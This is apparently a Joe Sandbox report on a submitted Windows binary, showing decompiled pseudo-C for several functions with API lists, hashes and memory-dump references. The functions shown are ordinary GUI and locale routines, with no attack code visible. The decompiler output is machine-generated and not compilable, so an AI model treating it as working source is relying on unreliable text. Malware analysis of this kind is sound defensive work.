					 *((intOrPtr*)(_t55 + 0x60)) = GetProcAddress( *(_t55 + 0x4c), "GetThemeSysColor");
					 *((intOrPtr*)(_t55 + 0x64)) = GetProcAddress( *(_t55 + 0x4c), "GetCurrentThemeName");
					 *((intOrPtr*)(_t55 + 0x68)) = GetProcAddress( *(_t55 + 0x4c), "GetWindowTheme");
					E009E9D83(_t55);
				}
				return _t55;
			}






      0x009ea5b2
      0x009ea5b7
      0x009ea5bc
      0x009ea5c2
      0x009ea5c5
      0x009ea5c8
      0x009ea5cb
      0x009ea5ce
      0x009ea5d1
      0x009ea5d4
      0x009ea5d7
      0x009ea5da
      0x009ea5dd
      0x009ea5e0
      0x009ea5e3
      0x009ea5e6
      0x009ea5e9
      0x009ea5ec
      0x009ea5ef
      0x009ea5f2
      0x009ea5f5
      0x009ea5f8
      0x009ea5fe
      0x009ea603
      0x009ea66d
      0x009ea670
      0x009ea673
      0x009ea676
      0x009ea679
      0x009ea67c
      0x009ea67f
      0x009ea605
      0x009ea61b
      0x009ea628
      0x009ea635
      0x009ea642
      0x009ea64f
      0x009ea65c
      0x009ea663
      0x009ea666
      0x009ea666
      0x009ea686

      APIs
        • Part of subcall function 009AB76B: ActivateActCtx.KERNEL32(?,?,00B0BB10,00000010), ref: 009AB78B
      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 009EA611
      • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 009EA61E
      • GetProcAddress.KERNEL32(?,DrawThemeBackground), ref: 009EA62B
      • GetProcAddress.KERNEL32(?,GetThemeColor), ref: 009EA638
      • GetProcAddress.KERNEL32(?,GetThemeSysColor), ref: 009EA645
      • GetProcAddress.KERNEL32(?,GetCurrentThemeName), ref: 009EA652
      • GetProcAddress.KERNEL32(?,GetWindowTheme), ref: 009EA65F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$Activate
      • String ID: CloseThemeData$DrawThemeBackground$GetCurrentThemeName$GetThemeColor$GetThemeSysColor$GetWindowTheme$OpenThemeData$UxTheme.dll
      • API String ID: 2388279185-1975976892
      • Opcode ID: 0da41f3d63796c414c1ac2c55432cdf3771d014b60a406beaf3b5e659bdfc8e9
      • Instruction ID: 44b0163291207b8a7969004042a4e234663790bf99cd496bc9f87ea71841100d
      • Opcode Fuzzy Hash: 0da41f3d63796c414c1ac2c55432cdf3771d014b60a406beaf3b5e659bdfc8e9
      • Instruction Fuzzy Hash: CA3133B0941B90AFC631AF6B994580BFAF9BEA4B143118D2FA58782B20D7B5A441DE41
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1BA3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 130libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 73%
      			E009B1BA3(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v210;
				char _v212;
				short _v216;
				char _v476;
				int _v580;
				intOrPtr _v584;
				char _v588;
				intOrPtr _v592;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				struct HINSTANCE__* _t52;
				signed int _t53;
				signed short _t57;
				signed int _t58;
				void* _t77;
				intOrPtr _t78;
				signed int _t82;
				signed int _t84;
				void* _t93;
				signed int _t94;
				struct HINSTANCE__* _t95;
				short* _t96;
				signed int _t98;
				void* _t99;
				void* _t100;
				signed int _t102;
				signed int _t104;
				void* _t105;
				void* _t107;

				_t102 = _t104;
				_t105 = _t104 - 0x24c;
				_t48 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t48 ^ _t102;
				_v584 = _a4;
				_push("KERNEL32.DLL");
				_v592 = _a8;
				_t98 = 0;
				_t52 = E009AB6E5(__ecx, 0, __eflags);
				if(_t52 != 0) {
					_t52 = GetProcAddress(_t52, "GetThreadPreferredUILanguages");
					_t95 = _t52;
					if(_t95 != 0) {
						_v212 = 0;
						_v588 = 0;
						E00AAB3F0( &_v210, 0, 0xc8);
						_t107 = _t105 + 0xc;
						_v580 = 0x65;
						_t52 = _t95->i(0x34,  &_v588,  &_v212,  &_v580);
						if(_t52 != 0) {
							_t96 =  &_v212;
							if(_v212 != 0) {
								while(_t98 < 0x14) {
									_t78 = E00AAF43D(_t96, 0, 0x10);
									_t107 = _t107 + 0xc;
									_t114 = _t78;
									if(_t78 != 0 &&  *((intOrPtr*)(E00AADB06(_t114))) != 0x22) {
										 *((intOrPtr*)(_t102 + _t98 * 4 - 0x23c)) = _t78;
										_t98 = _t98 + 1;
									}
									_t52 = E00AAF260(_t96);
									_t96 = _t96 + 2 + _t52 * 2;
									if( *_t96 != 0) {
										continue;
									}
									goto L10;
								}
							}
						}
					}
				}
				L10:
				__imp__GetUserDefaultUILanguage();
				_t53 = _t52 & 0x0000ffff;
				_t82 = _t53 & 0x000003ff;
				_v580 = _t82;
				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x23c)) = ConvertDefaultLocale(_t53 & 0x0000fc00 | _t82);
				_t57 = ConvertDefaultLocale(_v580);
				 *(_t102 + _t98 * 4 - 0x238) = _t57;
				__imp__GetSystemDefaultUILanguage();
				_t58 = _t57 & 0x0000ffff;
				_t84 = _t58 & 0x000003ff;
				_v580 = _t84;
				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x234)) = ConvertDefaultLocale(_t58 & 0x0000fc00 | _t84);
				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x230)) = ConvertDefaultLocale(_v580);
				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x22c)) = 0x800;
				_t99 = _t98 + 5;
				_v216 = 0;
				if(GetModuleFileNameA(0x9a0000,  &_v476, 0x105) == 0) {
					L14:
				} else {
					_t94 = 0;
					if(_t99 <= 0) {
						goto L14;
					} else {
						while(1) {
							_t90 = _v592;
							if(E009B1AD1(_v584, _v592,  *((intOrPtr*)(_t102 + _t94 * 4 - 0x23c))) != 0) {
								goto L15;
							}
							_t94 = _t94 + 1;
							if(_t94 < _t99) {
								continue;
							} else {
								goto L14;
							}
							goto L15;
						}
					}
				}
				L15:
				_pop(_t93);
				_pop(_t100);
				_pop(_t77);
				return E00AAB46A(0, _t77, _v8 ^ _t102, _t90, _t93, _t100);
			}




































      0x009b1ba6
      0x009b1ba8
      0x009b1bae
      0x009b1bb5
      0x009b1bbd
      0x009b1bc7
      0x009b1bcc
      0x009b1bd2
      0x009b1bd4
      0x009b1bdc
      0x009b1be8
      0x009b1bee
      0x009b1bf2
      0x009b1bff
      0x009b1c0e
      0x009b1c14
      0x009b1c19
      0x009b1c33
      0x009b1c3d
      0x009b1c41
      0x009b1c43
      0x009b1c50
      0x009b1c52
      0x009b1c61
      0x009b1c63
      0x009b1c66
      0x009b1c68
      0x009b1c74
      0x009b1c7b
      0x009b1c7b
      0x009b1c7d
      0x009b1c82
      0x009b1c8b
      0x00000000
      0x00000000
      0x00000000
      0x009b1c8b
      0x009b1c52
      0x009b1c50
      0x009b1c41
      0x009b1bf2
      0x009b1c8d
      0x009b1c8d
      0x009b1c99
      0x009b1c9e
      0x009b1cae
      0x009b1cbc
      0x009b1cc3
      0x009b1cc5
      0x009b1ccc
      0x009b1cd2
      0x009b1cd7
      0x009b1ce2
      0x009b1cf0
      0x009b1cf9
      0x009b1d0c
      0x009b1d1c
      0x009b1d1f
      0x009b1d30
      0x009b1d5a
      0x009b1d32
      0x009b1d32
      0x009b1d36
      0x00000000
      0x00000000
      0x009b1d38
      0x009b1d3f
      0x009b1d53
      0x00000000
      0x00000000
      0x009b1d55
      0x009b1d58
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b1d58
      0x009b1d38
      0x009b1d36
      0x009b1d5c
      0x009b1d5f
      0x009b1d60
      0x009b1d63
      0x009b1d6a

      APIs
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 009B1BE8
      • _memset.LIBCMT ref: 009B1C14
      • _wcstoul.LIBCMT ref: 009B1C5C
        • Part of subcall function 00AAF43D: wcstoxl.LIBCMT ref: 00AAF44D
      • _wcslen.LIBCMT ref: 009B1C7D
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      • GetUserDefaultUILanguage.KERNEL32 ref: 009B1C8D
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CB4
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CC3
      • GetSystemDefaultUILanguage.KERNEL32 ref: 009B1CCC
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CE8
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CF7
      • GetModuleFileNameA.KERNEL32(009A0000,?,00000105), ref: 009B1D28
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Default$ConvertLocale$Language$ActivateAddressFileModuleNameProcSystemUser__getptd_noexit_memset_wcslen_wcstoulwcstoxl
      • String ID: GetThreadPreferredUILanguages$KERNEL32.DLL$e
      • API String ID: 2246399177-2285706205
      • Opcode ID: 51abf7abbb5b952027a705bacf0c1f3f3c34bf85920033d57c736e0e8c7d8b6e
      • Instruction ID: 7312292a8025d92faf01733934cb0239f88e8ff9b4d13ac7f4246b53330daeca
      • Opcode Fuzzy Hash: 51abf7abbb5b952027a705bacf0c1f3f3c34bf85920033d57c736e0e8c7d8b6e
      • Instruction Fuzzy Hash: 9741A571901228ABCB60EFA4DD89BEE77B8EF44710F4105AAE90DE7180D7749E81CF60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A7ECC Relevance: 22.7, APIs: 15, Instructions: 199windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A7ECC(RECT* __ecx, struct HWND__* _a4, signed int _a8) {
				signed int _v8;
				RECT* _v12;
				int _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t72;
				RECT** _t74;
				int _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t88;
				struct HWND__* _t91;
				struct HWND__* _t96;
				struct HMENU__* _t98;
				struct HWND__* _t99;
				int _t104;
				RECT* _t116;
				int* _t118;
				RECT* _t130;
				RECT* _t133;
				signed int _t151;

				_t119 = __ecx;
				_t118 = _a8;
				_t130 = 0;
				_t133 = __ecx;
				if(_t118 != 0) {
					L2:
					_t72 =  *((intOrPtr*)(_t133->left + 0x16c))();
					_v20 = _t72;
					if(_t72 != _t130) {
						if(_a4 != _t130 &&  *(_t72 + 0xa0) != _t130) {
							_t116 =  *(_t72 + 0xa0);
							_t129 = _t116->left;
							_t119 = _t116;
							 *((intOrPtr*)(_t116->left + 0x5c))(_t130);
						}
						_t74 =  *(_t133 + 0xa8);
						_a8 = _t130;
						if(_t74 == _t130) {
							L18:
							_t118[2] = _a8;
							if(_a4 == _t130) {
								 *(_t133 + 0xd4) = _t130;
								_t76 = GetDlgItem( *(_t133 + 0x20), 0xea21);
								_a4 = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t91 = GetDlgItem( *(_t133 + 0x20), 0xe900);
									__eflags = _t91;
									if(_t91 != 0) {
										SetWindowLongA(_t91, 0xfffffff4, 0xea21);
									}
									SetWindowLongA(_a4, 0xfffffff4, 0xe900);
								}
								__eflags = _t118[1];
								if(_t118[1] != 0) {
									InvalidateRect( *(_t133 + 0x20), 0, 1);
									_t88 =  *((intOrPtr*)(_t133 + 0xf4));
									__eflags = _t88 - 1;
									if(_t88 != 1) {
										__eflags = _t88 - 2;
										if(_t88 == 2) {
											 *(_t133 + 0xf8) = _t118[1];
										}
									} else {
										SetMenu( *(_t133 + 0x20), _t118[1]);
									}
								}
								_t77 = _v20;
								__eflags =  *(_t77 + 0xa0);
								if( *(_t77 + 0xa0) != 0) {
									_t129 =  *( *(_t77 + 0xa0));
									 *((intOrPtr*)( *( *(_t77 + 0xa0)) + 0x5c))(1);
								}
								 *((intOrPtr*)(_t133->left + 0x174))(1);
								_t80 =  *_t118;
								__eflags = _t80 - 0xe900;
								if(_t80 != 0xe900) {
									_a4 = GetDlgItem( *(_t133 + 0x20), _t80);
								}
								ShowWindow(_a4, 5);
								 *(_t133 + 0x80) = _t118[5];
								return E009A653C(_t133, _t129, 1);
							}
							 *(_t133 + 0xd4) = _t118[4];
							E009A653C(_t133, _t129, _t130);
							_t96 = GetDlgItem( *(_t133 + 0x20),  *_t118);
							_a4 = _t96;
							ShowWindow(_t96, _t130);
							if( *((intOrPtr*)(_t133 + 0xf4)) != 1) {
								_t98 =  *(_t133 + 0xf8);
							} else {
								_t98 = GetMenu( *(_t133 + 0x20));
							}
							_t118[1] = _t98;
							if(_t98 != _t130) {
								InvalidateRect( *(_t133 + 0x20), _t130, 1);
								 *((intOrPtr*)(_t133->left + 0x70))(_t130);
								_t40 = _t133 + 0x10c;
								 *_t40 =  *(_t133 + 0x10c) & 0xfffffffe;
								_t151 =  *_t40;
							}
							_t118[5] =  *(_t133 + 0x80);
							 *(_t133 + 0x80) = _t130;
							_t99 = E009A6CCC(_t133, _t151, 0x7915);
							if( *_t118 != 0xe900) {
								_t99 = GetDlgItem( *(_t133 + 0x20), 0xe900);
								_a4 = _t99;
							}
							if(_a4 == 0) {
								return _t99;
							} else {
								return SetWindowLongA(_a4, 0xfffffff4, 0xea21);
							}
						}
						while(_t74 != _t130) {
							_t130 = _t74[2];
							_t119 =  *_t74;
							_v12 =  *_t74;
							if(_t130 == 0) {
								goto L1;
							}
							_t104 = GetDlgCtrlID( *(_t130 + 0x20));
							_t14 = _t104 - 0xe800; // -59392
							_t119 = _t14;
							_v16 = _t104;
							if(_t14 <= 0x1f) {
								_t16 = _t104 - 0xe800; // -59392
								_v8 = 1 << _t16;
								if( *((intOrPtr*)(_t130->left + 0x18c))() != 0) {
									_a8 = _a8 | _v8;
								}
								_t119 = _t130;
								if( *((intOrPtr*)(_t130->left + 0x194))() == 0 || _v16 != 0xe81f) {
									_t119 = _t133;
									E009A78B4(_t133, _t130, _t118[2] & _v8, 1);
								}
							}
							_t130 = 0;
							if(_v12 != 0) {
								_t74 = _v12;
								continue;
							} else {
								goto L18;
							}
						}
					}
				}
				L1:
				E009B8782(_t119);
				goto L2;
			}
























      0x009a7ecc
      0x009a7ed5
      0x009a7eda
      0x009a7edc
      0x009a7ee0
      0x009a7ee7
      0x009a7ee9
      0x009a7eef
      0x009a7ef4
      0x009a7ef9
      0x009a7f03
      0x009a7f09
      0x009a7f0c
      0x009a7f0e
      0x009a7f0e
      0x009a7f11
      0x009a7f17
      0x009a7f1c
      0x009a7f9b
      0x009a7f9e
      0x009a7fa4
      0x009a8065
      0x009a806b
      0x009a8071
      0x009a8079
      0x009a807b
      0x009a8081
      0x009a8087
      0x009a8089
      0x009a8093
      0x009a8093
      0x009a809f
      0x009a809f
      0x009a80a5
      0x009a80a9
      0x009a80b2
      0x009a80b8
      0x009a80be
      0x009a80c1
      0x009a80d1
      0x009a80d4
      0x009a80d9
      0x009a80d9
      0x009a80c3
      0x009a80c9
      0x009a80c9
      0x009a80c1
      0x009a80df
      0x009a80e2
      0x009a80e9
      0x009a80f1
      0x009a80f7
      0x009a80f7
      0x009a8100
      0x009a8106
      0x009a8108
      0x009a810a
      0x009a8116
      0x009a8116
      0x009a811e
      0x009a812b
      0x00000000
      0x009a8131
      0x009a7fb0
      0x009a7fb6
      0x009a7fc0
      0x009a7fc8
      0x009a7fcb
      0x009a7fd8
      0x009a7fe5
      0x009a7fda
      0x009a7fdd
      0x009a7fdd
      0x009a7feb
      0x009a7ff0
      0x009a7ff8
      0x009a8003
      0x009a8006
      0x009a8006
      0x009a8006
      0x009a8006
      0x009a8013
      0x009a801d
      0x009a8023
      0x009a802f
      0x009a8035
      0x009a803b
      0x009a803b
      0x009a8042
      0x009a813a
      0x009a8048
      0x00000000
      0x009a8052
      0x009a8042
      0x009a7f23
      0x009a7f27
      0x009a7f2a
      0x009a7f2c
      0x009a7f31
      0x00000000
      0x00000000
      0x009a7f36
      0x009a7f3c
      0x009a7f3c
      0x009a7f42
      0x009a7f48
      0x009a7f4a
      0x009a7f57
      0x009a7f64
      0x009a7f69
      0x009a7f69
      0x009a7f6e
      0x009a7f78
      0x009a7f8d
      0x009a7f8f
      0x009a7f8f
      0x009a7f78
      0x009a7f94
      0x009a7f99
      0x009a7f20
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a7f99
      0x009a7f23
      0x009a7ef4
      0x009a7ee2
      0x009a7ee2
      0x00000000

      APIs
      • GetDlgCtrlID.USER32 ref: 009A7F36
      • GetDlgItem.USER32 ref: 009A7FC0
      • ShowWindow.USER32(00000000,00000000), ref: 009A7FCB
      • GetMenu.USER32(?), ref: 009A7FDD
      • InvalidateRect.USER32(?,00000000,00000001), ref: 009A7FF8
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetDlgItem.USER32 ref: 009A8035
      • SetWindowLongA.USER32 ref: 009A8052
      • GetDlgItem.USER32 ref: 009A806B
      • GetDlgItem.USER32 ref: 009A8081
      • SetWindowLongA.USER32 ref: 009A8093
      • SetWindowLongA.USER32 ref: 009A809F
      • InvalidateRect.USER32(00000001,00000000,00000001), ref: 009A80B2
      • SetMenu.USER32(00000000,00000000), ref: 009A80C9
      • GetDlgItem.USER32 ref: 009A8110
      • ShowWindow.USER32(?,00000005), ref: 009A811E
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ItemWindow$Long$InvalidateMenuRectShow$CtrlException@8Throw
      • String ID:
      • API String ID: 3179827820-0
      • Opcode ID: 009bd2c3fd3cb32e6873dcd315b152d06d367894477539c448e7fd664b3a5573
      • Instruction ID: 5fe4c1cc4ac9a778caf1e0ee116d9ed572bf7b9f9e6b19498e06edf60a28c6fe
      • Opcode Fuzzy Hash: 009bd2c3fd3cb32e6873dcd315b152d06d367894477539c448e7fd664b3a5573
      • Instruction Fuzzy Hash: C9814330600604EFCB21DF64CC89BAABBF5FF49704F14896AF95A9B261DB359941CF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A382C6 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172COMMON
      Download Yara Rule
      C-Code - Quality: 95%
      			E00A382C6(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed int _t100;
				int _t105;
				void* _t113;
				int _t123;
				void* _t130;
				int _t135;
				int _t136;
				void*** _t143;
				signed int _t144;
				signed int _t146;
				int _t147;
				void* _t150;
				void* _t153;

				_t134 = __ebx;
				_push(0xa8);
				E00AAD29B(0xace3fd, __ebx, __edi, __esi);
				_t149 =  *(_t153 + 8);
				_t98 =  *_t149;
				_t146 =  *(_t153 + 0xc);
				 *(_t153 - 0x84) = _t146;
				if(_t98 != 0) {
					_t134 = GetObjectA;
					if(GetObjectA(_t98, 0x18, _t153 - 0xb4) != 0) {
						_t100 =  *(_t153 - 0xb0);
						 *(_t153 - 0x7c) = _t100;
						asm("cdq");
						_t144 = _t100 % _t146;
						 *(_t153 - 0x80) =  *(_t153 - 0xac);
						 *(_t153 - 0x68) = _t100 / _t146;
						if( *((short*)(_t153 - 0xa2)) != 0x20) {
							E009BA639(_t153 - 0x98);
							_t146 = 0;
							 *(_t153 - 4) = 0;
							E009BAD44(GetObjectA, _t153 - 0x98, _t144, 0, CreateCompatibleDC(0));
							_t150 =  *_t149;
							if(_t150 == 0) {
								 *(_t153 - 0x74) = 0;
							} else {
								 *(_t153 - 0x74) = SelectObject( *(_t153 - 0x94), _t150);
							}
							if( *(_t153 - 0x74) != _t146) {
								_t105 =  *(_t153 - 0x68);
								if(_t105 <= _t146) {
									L35:
									SelectObject( *(_t153 - 0x94),  *(_t153 - 0x74));
									_t149 = 1;
									L25:
									 *(_t153 - 4) =  *(_t153 - 4) | 0xffffffff;
									E009BADC5(_t153 - 0x98);
									L2:
									return E00AAD31E(_t134, _t146, _t149);
								}
								_t146 = SetPixel;
								_t135 = 0;
								 *(_t153 - 0x78) = 0;
								 *(_t153 - 0x7c) = _t105;
								do {
									 *(_t153 - 0x68) =  *(_t153 - 0x68) & 0x00000000;
									if( *(_t153 - 0x80) <= 0) {
										goto L34;
									}
									asm("cdq");
									 *(_t153 - 0x70) =  *(_t153 - 0x84) - _t144;
									 *(_t153 - 0x70) =  *(_t153 - 0x70) >> 1;
									do {
										 *(_t153 - 0x6c) = _t135;
										_t136 = _t135 +  *(_t153 - 0x84) - 1;
										_t113 =  *(_t153 - 0x70);
										if(_t113 <= 0) {
											goto L33;
										}
										 *(_t153 - 0x88) = _t113;
										do {
											 *(_t153 - 0x9c) = GetPixel( *(_t153 - 0x94),  *(_t153 - 0x6c),  *(_t153 - 0x68));
											SetPixel( *(_t153 - 0x94),  *(_t153 - 0x6c),  *(_t153 - 0x68), GetPixel( *(_t153 - 0x94), _t136,  *(_t153 - 0x68)));
											SetPixel( *(_t153 - 0x94), _t136,  *(_t153 - 0x68),  *(_t153 - 0x9c));
											 *(_t153 - 0x6c) =  *(_t153 - 0x6c) + 1;
											_t136 = _t136 - 1;
											_t83 = _t153 - 0x88;
											 *_t83 =  *(_t153 - 0x88) - 1;
										} while ( *_t83 != 0);
										L33:
										 *(_t153 - 0x68) =  *(_t153 - 0x68) + 1;
										_t135 =  *(_t153 - 0x78);
									} while ( *(_t153 - 0x68) <  *(_t153 - 0x80));
									L34:
									_t135 = _t135 +  *(_t153 - 0x84);
									_t91 = _t153 - 0x7c;
									 *_t91 =  *(_t153 - 0x7c) - 1;
									 *(_t153 - 0x78) = _t135;
								} while ( *_t91 != 0);
								goto L35;
							}
							_t149 = 0;
							goto L25;
						}
						if(GetObjectA( *_t149, 0x54, _t153 - 0x64) == 0 ||  *((short*)(_t153 - 0x52)) != 0x20) {
							goto L4;
						} else {
							_t123 =  *(_t153 - 0x50);
							if(_t123 == 0) {
								goto L4;
							}
							if( *(_t153 - 0x68) <= 0) {
								goto L1;
							}
							 *(_t153 - 0x6c) = _t123;
							_t134 = _t146 << 2;
							do {
								if( *(_t153 - 0x80) <= 0) {
									goto L18;
								}
								_t147 =  *(_t153 - 0x6c);
								asm("cdq");
								 *(_t153 - 0x70) = _t146 - _t144;
								 *(_t153 - 0x70) =  *(_t153 - 0x70) >> 1;
								 *(_t153 - 0x78) =  *(_t153 - 0x80);
								do {
									_t130 =  *(_t153 - 0x70);
									_t144 = _t147;
									_t143 = _t147 + _t134 - 4;
									if(_t130 <= 0) {
										goto L16;
									}
									 *(_t153 - 0x74) = _t130;
									do {
										_t149 =  *_t144;
										 *_t144 =  *_t143;
										 *_t143 =  *_t144;
										_t144 = _t144 + 4;
										_t143 = _t143 - 4;
										_t33 = _t153 - 0x74;
										 *_t33 =  *(_t153 - 0x74) - 1;
									} while ( *_t33 != 0);
									L16:
									_t147 = _t147 + ( *(_t153 - 0x7c) << 2);
									_t36 = _t153 - 0x78;
									 *_t36 =  *(_t153 - 0x78) - 1;
								} while ( *_t36 != 0);
								_t146 =  *(_t153 - 0x84);
								L18:
								 *(_t153 - 0x6c) =  *(_t153 - 0x6c) + _t134;
								_t41 = _t153 - 0x68;
								 *_t41 =  *(_t153 - 0x68) - 1;
							} while ( *_t41 != 0);
							goto L1;
						}
					}
					L4:
					goto L2;
				}
				L1:
				goto L2;
			}

















      0x00a382c6
      0x00a382c6
      0x00a382d0
      0x00a382d5
      0x00a382d8
      0x00a382da
      0x00a382dd
      0x00a382e5
      0x00a382f2
      0x00a38306
      0x00a3830c
      0x00a38312
      0x00a38315
      0x00a38316
      0x00a38326
      0x00a38329
      0x00a3832c
      0x00a383c5
      0x00a383ca
      0x00a383cd
      0x00a383dd
      0x00a383e2
      0x00a383e6
      0x00a383fa
      0x00a383e8
      0x00a383f5
      0x00a383f5
      0x00a38400
      0x00a3841a
      0x00a3841f
      0x00a384dd
      0x00a384e6
      0x00a384ee
      0x00a38404
      0x00a38404
      0x00a3840e
      0x00a382ea
      0x00a382ef
      0x00a382ef
      0x00a3842b
      0x00a38431
      0x00a38433
      0x00a38436
      0x00a38439
      0x00a38439
      0x00a38441
      0x00000000
      0x00000000
      0x00a3844d
      0x00a38450
      0x00a38453
      0x00a38456
      0x00a3845c
      0x00a3845f
      0x00a38463
      0x00a38468
      0x00000000
      0x00000000
      0x00a3846a
      0x00a38470
      0x00a38481
      0x00a3849d
      0x00a384af
      0x00a384b1
      0x00a384b4
      0x00a384b5
      0x00a384b5
      0x00a384b5
      0x00a384bd
      0x00a384bd
      0x00a384c3
      0x00a384c6
      0x00a384cb
      0x00a384cb
      0x00a384d1
      0x00a384d1
      0x00a384d4
      0x00a384d4
      0x00000000
      0x00a38439
      0x00a38402
      0x00000000
      0x00a38402
      0x00a3833e
      0x00000000
      0x00a38347
      0x00a38347
      0x00a3834c
      0x00000000
      0x00000000
      0x00a38352
      0x00000000
      0x00000000
      0x00a38354
      0x00a3835c
      0x00a38362
      0x00a38366
      0x00000000
      0x00000000
      0x00a3836a
      0x00a3836d
      0x00a38370
      0x00a38376
      0x00a38379
      0x00a3837c
      0x00a3837c
      0x00a3837f
      0x00a38381
      0x00a38387
      0x00000000
      0x00000000
      0x00a38389
      0x00a3838c
      0x00a3838e
      0x00a38390
      0x00a38392
      0x00a38394
      0x00a38397
      0x00a3839a
      0x00a3839a
      0x00a3839a
      0x00a3839f
      0x00a383a5
      0x00a383a7
      0x00a383a7
      0x00a383a7
      0x00a383ac
      0x00a383b2
      0x00a383b2
      0x00a383b5
      0x00a383b5
      0x00a383b5
      0x00000000
      0x00a383ba
      0x00a3833e
      0x00a38308
      0x00000000
      0x00a38308
      0x00a382e7
      0x00000000

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 00A382D0
      • GetObjectA.GDI32(00000000,00000018,?), ref: 00A38302
      • GetObjectA.GDI32(?,00000054,?), ref: 00A3833A
      • CreateCompatibleDC.GDI32(00000000), ref: 00A383D0
      • SelectObject.GDI32(?,?), ref: 00A383EF
      • GetPixel.GDI32(?,?,00000000), ref: 00A3847C
      • GetPixel.GDI32(?,?,00000000), ref: 00A3848E
      • SetPixel.GDI32(?,?,00000000,00000000), ref: 00A3849D
